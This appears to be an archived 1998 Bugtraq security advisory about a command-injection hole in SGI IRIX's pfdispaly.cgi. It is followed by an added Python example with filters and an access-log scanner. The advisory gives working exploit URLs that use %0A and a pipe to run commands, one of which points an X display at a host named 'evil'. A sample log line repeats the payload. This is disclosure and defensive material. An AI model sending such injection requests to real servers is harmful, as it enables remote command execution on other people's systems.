| Summary | |
|---|---|
| Description: | As has been demonstrated many times, SGI CANNOT write secure CGI scripts. Nor can they write secure setuid programs. They fixed the last pfdisplay.cgi hole, but the new version is still quite buggy -- as this post demonstrates. |
| Author: | "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES> |
| Compromise: | run arbitrary commands remotely as the UID running the webserver |
| Vulnerable Systems: | SGI IRIX 6.2 using the performer_tools CGIs. |
| Date: | 7 April 1998 |
| Notes: | I honestly believe default SGI security is as bad as default Windows NT security. That is sad. |
| Details |
|---|
Date: Tue, 7 Apr 1998 03:16:01 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: performer_tools again
Hi
There is already a patch from SGI to the pfdispaly.cgi '../..' bug. But it seems it fixes only that problem, without checking the rest of the code for similar vulnerabilities, so even after patch 3018 (04/01/98) you can try:
$ lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
uname -a\| file
IRIX victim 6.2 03131015 IP22
or
$ lynx -dump \
http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'
(You probably will notice this exploit is similar to that one on 'wrap'; it's nice to find that sometimes reusing code does work)
The fix is easy (for this particular problem); so it's left to the reader.

Anyway, if you're using SGI cgi's you should consider limiting the access to your domain...
--
J.A. Gutierrez                    So be easy and free
                                  when you're drinking with me
                                  I'm a man you don't meet every day
finger me for PGP                 (the pogues)
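The post leaves the fix to the reader. The Python below is an added example, not code from the post or from SGI: it shows why a check that only rejects '../' lets the %0A...| request through, what a decode-then-allow-list check on the file-name parameter looks like instead, and how to flag such requests in a web server access log. The two filter functions are assumed shapes of the code rather than the real pfdispaly.cgi or patch 3018, and the log lines are constructed samples.

```python
"""Added example, not code from the post or from SGI.  Shows why a fix that
only blocks '../' does nothing against the %0A...| request in the post, an
allow-list check for the file-name parameter, and a log scan that flags such
requests.  The filters are assumed shapes of the code (not the real
pfdispaly.cgi or patch 3018); the log lines are constructed samples."""
import re
from urllib.parse import unquote, urlsplit

SHELL_META = set("|;&$`<>\n\r\0")   # acted on by a shell or a pipe-style open()
NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

def traversal_only_filter(raw: str) -> bool:
    """Assumed shape of the first fix: only the '../' traversal is rejected."""
    return "../" not in unquote(raw)

def allowlist_filter(raw: str) -> bool:
    """Defensive check: decode first, then accept only a plain base name."""
    name = unquote(raw)
    return NAME_RE.fullmatch(name) is not None and ".." not in name

def metachars(raw: str) -> list:
    """Shell-relevant characters that survive URL decoding (alert detail)."""
    return sorted(c for c in set(unquote(raw)) if c in SHELL_META)

def suspicious_requests(log_lines):
    """(client, path, metachars) for /cgi-bin/ requests whose query string
    decodes to shell metacharacters; not tied to one script name."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        bad = metachars(parts.query)
        if parts.path.startswith("/cgi-bin/") and bad:
            hits.append((client, parts.path, bad))
    return hits

# Constructed sample log lines in common log format, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Apr/1998:03:16:01 +0200] "GET /cgi-bin/pfdispaly.cgi?town.pfb HTTP/1.0" 200 512',
    '10.0.0.9 - - [07/Apr/1998:03:17:44 +0200] "GET /cgi-bin/pfdispaly.cgi?%0A/bin/uname%20-a| HTTP/1.0" 200 90',
    '10.0.0.9 - - [07/Apr/1998:03:18:02 +0200] "GET /index.html HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for client, path, bad in suspicious_requests(SAMPLE_LOG):
        print(f"{client} {path} metachars={bad!r}")
```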